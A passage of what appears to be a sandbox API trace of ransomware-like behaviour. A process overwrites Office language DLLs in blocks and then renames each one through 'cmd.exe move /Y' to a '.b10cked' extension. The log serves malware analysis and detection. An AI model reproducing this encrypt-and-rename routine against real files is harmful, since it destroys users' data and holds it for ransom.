returned 1 [0159.385] SetFilePointer (in: hFile=0x114, lDistanceToMove=-13487, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x34b1 [0159.385] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x34af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x34af, lpOverlapped=0x0) returned 1 [0159.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=-13487, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x34b1 [0159.386] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x34af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x34af, lpOverlapped=0x0) returned 1 [0159.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISBRRES.DLL.trx_dll", cchWideChar=20, 
lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0159.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISBRRES.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISBRRES.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0159.391] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x6960 [0159.391] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0159.391] CloseHandle (hObject=0x114) returned 1 [0159.394] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX") returned 0x3c [0159.395] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0159.395] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, 
dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x7ac, dwThreadId=0x7f8)) returned 1 [0159.397] CloseHandle (hObject=0x1b4) returned 1 [0159.397] CloseHandle (hObject=0x114) returned 1 [0159.397] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0159.397] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0159.397] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0159.397] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0159.398] ReleaseMutex (hMutex=0xf8) returned 1 [0159.398] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0159.398] ReleaseMutex (hMutex=0xf8) returned 1 [0159.398] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0159.398] ReleaseMutex (hMutex=0xf8) returned 1 [0159.398] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0159.398] ReleaseMutex (hMutex=0xf8) returned 1 [0159.398] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0159.401] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.401] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.401] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.401] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21619041361) returned 1 [0159.401] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.401] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.401] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.401] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.401] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.403] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.403] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.403] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.403] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.403] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.403] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.403] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.403] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x77078 [0159.403] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0159.817] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0159.817] SetFilePointer 
(in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0159.817] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x77560 [0159.817] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0159.817] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0159.817] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0159.817] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x77560 [0159.817] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0159.818] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0159.818] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0159.884] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0159.977] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, 
lpOverlapped=0x0) returned 1 [0160.007] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0160.007] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.008] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.008] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0160.008] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x57560 [0160.008] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.025] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.042] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0160.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x57560 [0160.044] WriteFile (in: hFile=0x114, 
lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.044] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.045] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0160.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0160.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0160.050] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x77560 [0160.050] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0160.051] CloseHandle (hObject=0x114) returned 1 [0160.056] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX") returned 0x3c [0160.057] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0160.058] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xedc, dwThreadId=0xe14)) returned 1 [0160.060] CloseHandle (hObject=0x1b4) returned 1 [0160.060] CloseHandle (hObject=0x114) returned 1 [0160.060] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0160.060] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0160.060] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL 
USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0160.060] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.060] ReleaseMutex (hMutex=0xf8) returned 1 [0160.060] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.060] ReleaseMutex (hMutex=0xf8) returned 1 [0160.060] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.060] ReleaseMutex (hMutex=0xf8) returned 1 [0160.060] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.060] ReleaseMutex (hMutex=0xf8) returned 1 [0160.061] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0160.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25b60 [0160.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.061] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21685031028) returned 1 [0160.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25b60 [0160.061] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25b60 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x25b60 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25b60 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 
0x25b60 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25b60 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 